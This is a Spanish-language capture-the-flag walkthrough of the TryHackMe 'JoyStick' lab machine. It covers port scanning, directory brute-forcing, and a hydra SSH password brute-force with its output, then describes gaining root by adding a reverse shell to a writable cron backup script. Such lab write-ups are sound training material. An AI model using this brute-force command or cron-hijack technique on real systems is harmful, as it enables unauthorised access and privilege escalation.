This page looks best with JavaScript enabled

TryHackMe - JoyStick

 ·  ☕ 3 min read  ·  ✍️ sckull

JoyStick es una maquina de TryHackMe aqui encontrarás la solucion para obtener la flag user.txt y root.txt.

Informacion de la Maquina

Titulo JoyStick
Info Anyone want to play?
Puntos 60
Dificultad Facil
Maker DarkStar7471

NMAP

Escaneo de puertos tcp, nmap nos muestra el puerto ftp (21), http (80) y el puerto ssh (22) abiertos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
# Nmap 7.80 scan initiated Fri Jul 17 00:47:51 2020 as: nmap -sV -o nmap_scan_mini joystick.thm
Nmap scan report for joystick.thm (10.10.184.33)
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 17 00:48:28 2020 -- 1 IP address (1 host up) scanned in 37.10 seconds

FTP

Intentamos ingresar con credenciales de anonymous en el servicio de FTP pero nos muestra un mensaje de error.

1
2
3
4
5
6
7
8
root@upset:~/thm/joystick# ftp joystick.thm 
Connected to joystick.thm.
220 (vsFTPd 3.0.3)
Name (joystick.thm:root): anonymous
500 OOPS: vsftpd: refusing to run with writable root inside chroot()
Login failed.
ftp> exit
421 Service not available, remote server has closed connection

HTTP

Encontramos una pagina web en el puerto 80, en el codigo fuente encontramos un mensaje que menciona el usuario steve.
image

GOBUSTER

Utilizamos gobuster para busqueda de directorios y archivos.

1
2
root@upset:~/thm/joystick# gobuster dir -u http://joystick.thm/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -q -t 25 -x php,html,txt
/index.html (Status: 200)

STEVE - USER

Utilizamos hydra para hacer un ataque de fuerza bruta en el servicio ssh con el usuario steve y el wordlist rockyou.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
root@upset:~/thm/joystick# hydra -l steve -P /usr/share/wordlists/rockyou.txt ssh://joystick.thm -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-17 01:12:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://joystick.thm:22/
[STATUS] 233.00 tries/min, 233 tries in 00:01h, 14344194 to do in 1026:04h, 64 active
[STATUS] 215.00 tries/min, 645 tries in 00:03h, 14343800 to do in 1111:56h, 64 active
[STATUS] 210.29 tries/min, 1472 tries in 00:07h, 14342999 to do in 1136:48h, 64 active
[STATUS] 207.53 tries/min, 3113 tries in 00:15h, 14341391 to do in 1151:45h, 64 active
[STATUS] 343.68 tries/min, 10654 tries in 00:31h, 14333874 to do in 695:08h, 64 active
[22][ssh] host: joystick.thm	login: steve 	password: [... snip ...]
^C

Ingresamos por SSH, obtenemos una shell y nuestra flag user.txt
image

PRIVILEGE ESCALATION

Utilizamos pspy64 para ver los cronjobs que se encuentran en la maquina, encontramos que se ejecuta el archivo /opt/minecraft/backup.sh.
image

Agregamos una shell inversa al archivo y ponemos a la escucha netcat en nuestra maquina.
image

Obtenemos una shell con el usuario root.
image

Encontramos la flag root.txt en /home/notch.
image

Share on

sckull
WRITTEN BY
sckull
Pentester wannabe

THM: JoyStick